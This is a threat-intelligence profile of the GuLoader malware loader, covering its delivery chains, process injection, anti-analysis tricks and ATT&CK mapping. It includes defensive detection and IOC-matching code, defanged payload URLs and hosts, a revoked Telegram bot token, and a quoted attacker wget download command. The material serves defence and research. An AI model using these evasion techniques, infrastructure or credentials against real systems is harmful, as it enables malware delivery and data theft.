GuLoader
GuLoader is a shellcode-based malware downloader/dropper first observed in December 2019 and still under active development. It is widely used in phishing-driven intrusion chains and other malicious delivery workflows to fetch, decrypt, and execute follow-on payloads in memory while minimizing on-disk artifacts. Infection vectors reported in the source content include phishing emails, malicious web links, embedded macros in malicious Word documents, tax-themed phishing campaigns, malicious LNK-based delivery chains, and exploitation of WinRAR CVE-2023-38831 via crafted ZIP archives. Current variants described in the content are VBScript- and NSIS-based; earlier versions were implemented as VB6 applications.
Its primary role is payload delivery. The content explicitly states GuLoader has been used to distribute Formbook, XLoader, Remcos, 404Keylogger, LokiBot, AgentTesla, NanoCore, NetWire, VIPKeylogger, PhantomStealer, Rhadamanthys, and Makop ransomware payloads, and has also been referenced alongside DarkGate, DbatLoader, Amadey, Latrodectus, BruteRatel C4, and other loaders in phishing ecosystems. In one Microsoft-observed March 2025 tax-themed campaign, a .bat file downloaded GuLoader, which then installed Remcos. Other cited campaigns include active 2026 credential-theft operations targeting primarily Italian businesses, where NSIS-wrapped GuLoader samples delivered Agent Tesla and VIPKeylogger.
GuLoader is characterized by strong evasion and in-memory execution. It can inject shellcode into a donor process started in a suspended state and has used RegAsm as a donor process. The content also describes process hollowing and injection using MapViewOfSection and WriteProcessMemory. GuLoader commonly stores encrypted shellcode or payloads on public cloud services such as Google Drive, and more recent reporting also mentions OneDrive. Payloads are decrypted and executed in memory; the encrypted payloads are stored without PE headers to reduce antivirus and cloud-scanning visibility. One analyzed VBScript chain used obfuscated PowerShell, saved downloaded data to %APPDATA%\Umig.For, decoded a shellcode blob, and transferred execution via CallWindowProc; on 64-bit systems it invoked the SysWOW64 PowerShell because the shellcode required a 32-bit process.
The malware includes extensive anti-analysis and obfuscation. Reported techniques include sandbox evasion through VM and hypervisor checks, timing checks with RDTSC/CPUID, QEMU artifact checks, window counting, driver enumeration, and installed-software enumeration; anti-debugging via hooks on DbgBreakPoint and DbgUiRemoveBreakIn and use of NtSetInformationThread with ThreadHideFromDebugger; encrypted strings and URLs with runtime reconstruction of http/https schemes; and exception-driven control-flow obfuscation using a vectored exception handler (VEH). Since late 2022, GuLoader has deliberately raised access-violation, single-step, and breakpoint exceptions and used RtlAddVectoredExceptionHandler to compute the next execution address dynamically. The VEH logic checks debug registers, can crash when hardware breakpoints are present, and scans for software breakpoints, complicating static and dynamic analysis.
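A defender-side way to turn the chain described above into a detection, as an added example that is not from the original page or any vendor report: it scores constructed Sysmon-style process, file and cross-process events for the stages the chain shows (a script host launching the SysWOW64 PowerShell, a write under %APPDATA%, a RegAsm donor spawned and then accessed from PowerShell). The event field names, the sample events and the alert threshold are assumptions.

```python
import re

# Constructed Sysmon-style events (field names are assumptions), ordered by time:
# id 1 = process create, 11 = file create, 10 = process access, 8 = remote thread.
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"id": 1, "pid": 400, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 500, "image": PS32, "parent_image": r"C:\Windows\System32\wscript.exe"},
    {"id": 11, "pid": 500, "image": PS32, "target": r"C:\Users\alice\AppData\Roaming\Umig.For"},
    {"id": 1, "pid": 600, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "parent_image": PS32},
    {"id": 10, "pid": 500, "target_pid": 600},
    {"id": 8, "pid": 500, "target_pid": 600},
]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DONORS = {"regasm.exe", "regsvcs.exe", "msbuild.exe"}  # RegAsm is the donor named on the page

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_chain(events):
    """Return one string per matched stage of the loader chain, in event order."""
    stages, images = [], {}  # images: pid -> image basename of every created process
    for e in events:
        if e["id"] == 1:
            img, parent = basename(e["image"]), basename(e["parent_image"])
            images[e["pid"]] = img
            if img == "powershell.exe" and parent in SCRIPT_HOSTS:
                bits = "SysWOW64 (32-bit)" if "\\syswow64\\" in e["image"].lower() else "System32"
                stages.append(f"script host {parent} spawned {bits} PowerShell")
            elif img in DONORS and parent == "powershell.exe":
                stages.append(f"PowerShell spawned donor candidate {img}")
        elif e["id"] == 11 and images.get(e["pid"]) == "powershell.exe" \
                and re.search(r"\\appdata\\roaming\\", e["target"], re.I):
            stages.append("PowerShell wrote a staging file under %APPDATA%")
        elif e["id"] in (8, 10) and images.get(e["pid"]) == "powershell.exe" \
                and images.get(e["target_pid"]) in DONORS:
            what = "opened with process access" if e["id"] == 10 else "received a remote thread"
            stages.append(f"donor {images[e['target_pid']]} {what} from PowerShell")
    return stages

def is_guloader_like(events, min_stages=3):
    """Alert only when several stages line up, so a lone PowerShell launch stays quiet."""
    return len(score_chain(events)) >= min_stages

if __name__ == "__main__":
    print("\n".join(score_chain(EVENTS)), "\nverdict:", is_guloader_like(EVENTS))
```

Sysmon does not record the CREATE_SUSPENDED flag itself, so the suspended-donor step is inferred from the later process-access and remote-thread events against the freshly spawned donor.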
The content links GuLoader to financially motivated cybercrime activity rather than a single exclusive threat actor. It is associated with phishing campaigns attributed in one case to initial access broker Storm-0249, with commodity malware delivery operations, and with campaigns abusing legitimate SMB/shared hosting and cloud infrastructure. Targeting described in the content is broad and opportunistic, including Italian and international businesses, tax-themed phishing recipients, and victims of credential-theft and RAT-delivery campaigns.
High-confidence indicators explicitly mentioned in the content include: GuLoader sample SHA-256 350c7cdc9d10c12ae1c490890975e387421616170f710ebbf9fa6d29fbf4b7dc (Ustabil.exe); GuLoader sample SHA-256 5fcfdf0e241a0347f9ff9caa897649e7fe8f25757b39c61afddbe288202696d5; VBScript MD5 9623c946671c6ec7a30b7c45125d5d48; shellcode MD5 141da1d174041a32cc6a234d80d0b850; encrypted Remcos payload MD5 bcea24378a2134429ca82164827f1c25; decrypted Remcos payload MD5 d5335a1ec161a8430e564bc66c16f894; NSIS MD5 40b9ca22013d02303d49d8f922ac2739; encrypted shellcode MD5 c6e068ce04fb4959e2e6daaebac8d893; decrypted Formbook payload MD5 66274853e6f35e3fef0645a6587cb892; Google Drive URLs hxxps://drive.google.com/uc?export=download&id=1BZ2BJVzqOMDwarpjiTzKEiwa42W1Dj9q and hxxps://drive.google.com/uc?export=download&id=1soTWv6y3rkBBbmMcBMOwovCqXxU4UQRB; FTP infrastructure holzbrenzii[.]com (198[.]27[.]80[.]139) and corwineagles[.]com (162[.]241[.]123[.]75); SMTP infrastructure mail[.]onionmail[.]org / onionmail[.]org; and Telegram bot token 8729572560:AAH7-pGiLevApfXHCGKQfSyCpF9fVTqxN9Q with chat ID 8277275661, noted as revoked after detection.
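The indicators above are published defanged (hxxps, [.]). An added example, not from the page or from Mallory, that refangs a subset of them, classifies each by type and matches them against constructed telemetry lines, so a practitioner can check the values against their own logs. The log format, host and user names are made up.

```python
import re
# Indicators quoted on the page, kept in the defanged form in which they were published.
PAGE_IOCS = """
350c7cdc9d10c12ae1c490890975e387421616170f710ebbf9fa6d29fbf4b7dc
9623c946671c6ec7a30b7c45125d5d48
hxxps://drive.google.com/uc?export=download&id=1BZ2BJVzqOMDwarpjiTzKEiwa42W1Dj9q
holzbrenzii[.]com
198[.]27[.]80[.]139
"""
SAMPLE_LOG = [  # constructed telemetry lines, not real logs
    "t=1 proxy user=alice GET https://drive.google.com/uc?export=download&id=1BZ2BJVzqOMDwarpjiTzKEiwa42W1Dj9q 200",
    "t=2 edr host=WS17 file=Ustabil.exe sha256=350C7CDC9D10C12AE1C490890975E387421616170F710EBBF9FA6D29FBF4B7DC",
    "t=3 fw dst=198.27.80.139 dport=21 action=allow dstname=holzbrenzii.com",
]
HEX = {64: "sha256", 40: "sha1", 32: "md5"}

def refang(s):
    return re.sub(r"^hxxp", "http", s.strip(), flags=re.I).replace("[.]", ".")

def classify(ioc):
    """Return (type, normalized value); hashes and domains are lower-cased for matching."""
    v = refang(ioc)
    if re.fullmatch(r"[0-9a-fA-F]+", v) and len(v) in HEX:
        return HEX[len(v)], v.lower()
    if re.fullmatch(r"(\d{1,3}\.){3}\d{1,3}", v):
        return "ipv4", v
    if re.match(r"https?://", v, re.I):
        return "url", v
    if re.fullmatch(r"[a-z0-9.-]+\.[a-z]{2,}", v, re.I):
        return "domain", v.lower()
    return "unknown", v

def build_index(raw):
    idx = {}  # type -> set of normalized indicator values
    for kind, val in map(classify, raw.split()):
        idx.setdefault(kind, set()).add(val)
    return idx

def scan(lines, idx):
    """Return (line_no, type, value) for every indexed indicator found in the telemetry lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        for tok in re.findall(r"\b[0-9a-f]{32,64}\b", low):  # hash match is case-insensitive
            if tok in idx.get(HEX.get(len(tok)), ()):
                hits.append((n, HEX[len(tok)], tok))
        for ip in re.findall(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])", line):
            if ip in idx.get("ipv4", ()):
                hits.append((n, "ipv4", ip))
        hits += [(n, "domain", d) for d in idx.get("domain", ()) if d in low]
        hits += [(n, "url", u) for u in idx.get("url", ()) if u in line]  # Drive ids are case-sensitive
    return hits
```

Domains and URLs are matched by substring here; a production rule should anchor on the host field of the log so that a longer unrelated name does not match.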
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Group-IB Threat Intelligence unit discovered a zero-day vulnerability, CVE-2023-38831, in WinRAR, a popular compression tool. Cybercriminals exploited this vulnerability to deliver various malware families, including DarkMe and GuLoader, by crafting ZIP archives with spoofed extensions, which were then distributed on trading forums.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Earlier this April, the Redmond-based company warned of several phishing campaigns leveraging tax-related themes to deploy malware such as Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4). The phishing pages, it added, were delivered via RaccoonO365, with one such campaign attributed to an initial access broker called Storm-0249.
"...Visual Basic loaders —including the Guloader malware dropper discovered by Proofpoint in December 2019."
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Campaigns using RaccoonO365 have been active since September 2024. These attacks typically mimic trusted brands like Microsoft, DocuSign, SharePoint, Adobe, and Maersk in fraudulent emails, tricking recipients into clicking on lookalike pages that are designed to capture victims' Microsoft 365 usernames and passwords.
MITRE ATT&CK mapping | Tactic: Initial Access | Technique: Spearphishing Attachment | ID: T1566.001 | Implementation: .bat/.exe email attachments with BEC lures
Execution
6 techniques
The purpose of this code is to call the PowerShell interpreter and pass it the code of the script collected in the “pa0” variable as a parameter.
Currently, the most common versions are based on the VBScript and the NSIS installer... VBScript itself contains only a small obfuscated PowerShell script and a lot of junk code.
The content repeatedly mentions malicious macros in Word/Excel documents, such as "enable macros," "embedded macros," and "macro-enabled documents."
MITRE ATT&CK mapping | Tactic: Execution | Technique: Native API | ID: T1106 | Implementation: System.dll calls VirtualAlloc, CallWindowProcA
The content repeatedly describes victims being lured into opening malicious attachments, enabling macros, launching installers, clicking embedded files/links, or otherwise directly executing malicious content.
Persistence
2 techniques
Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include AppleSeed creating 'HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce', AvosLocker executed via the RunOnce Registry key, NanoCore creating a RunOnce key, and Raspberry Robin setting a RunOnce key.
Privilege Escalation
3 techniques
The content repeatedly describes adversaries and malware injecting code, shellcode, DLLs, or payloads into legitimate processes such as svchost.exe, explorer.exe, iexplore.exe, wuauclt.exe, lsass.exe, and browser processes.
GuLoader has the ability to inject shellcode into donor processes that are started in a suspended state. Cardinal RAT injects into a newly spawned process created from a native Windows executable. Pandora can start and inject code into a new svchost process. ShadowPad has injected an install module into a newly created process.
Stealth
13 techniques
GuLoader’s payload is fully encrypted, including PE headers... Earlier versions of GuLoader were implemented as VB6 applications containing encrypted shellcode. Currently, the most common versions are based on the VBScript and the NSIS installer.
MITRE ATT&CK mapping | Tactic: Defense Evasion | Technique: Binary Padding | ID: T1027.001 | Implementation: Single-byte fill files to inflate archive size
MITRE ATT&CK mapping | Tactic: Defense Evasion | Technique: Software Packing | ID: T1027.002 | Implementation: NSIS wrapper as legitimate installer framework
"The .lnk file also includes an innocuous .pdf file that launches in parallel with the malicious activity"
MITRE ATT&CK mapping | Tactic: Defense Evasion | Technique: Masquerading: Match Legitimate Extension | ID: T1036.008 | Implementation: .bat extension on PE executable
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
As in previous GuLoader versions, the shellcode implements a large number of anti-analysis techniques: Sandbox evasion techniques including: Scanning memory for VM-related strings. Checking if the hypervisor bit is enabled, using CPUID instruction... Measuring time, using RDTSC... Searching for QEMU related files... Counting the number of windows... Checking if there are any VM-related drivers present... Enumerating installed software...
the script allocates 2 memory areas, downloads the data from the link to Google Drive, and saves it to a temporary file “%APPDATA%\Umig.For”.
the loader... decrypts and runs it in memory without dropping the decrypted data to the hard drive.
Defense Impairment
2 techniques
MITRE ATT&CK mapping | Tactic: Defense Evasion | Technique: Subvert Trust Controls: Code Signing | ID: T1553.002 | Implementation: Fraudulent self-signed cert with DigiCert timestamp
Discovery
4 techniques
Enumerating installed software, using the MsiEnumProductsA and MsiGetProductInfoA.
Command and Control
3 techniques
The most significant technical change is where the malware stores its core configuration. Rather than embedding C2 URLs as readable strings, the authors have moved that data into the .NET resource section, scrambled with XOR encoding.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
Examples include: 'APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits,' 'APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads,' and many malware families used HTTP GET/POST or HTTPS to download additional payloads or files.
IOCs tracked for this family
32 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
58 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mentioned as a malware family that uses the resource section to hide payloads.
Gremlin stealer uses the resource section to mirror the tactics of several high-profile malware families that frequently use this area for payload obfuscation, including: Agent Tesla, GuLoader, LokiBot, Quasar RAT.
Loader used in the shared delivery chain and campaign graph linking the AgentTesla and PhantomStealer deployments. It appears as a common delivery component rather than the final payload.
GuLoader is referenced as the delivery mechanism used to deploy Remcos RAT in the earlier phase of the campaign.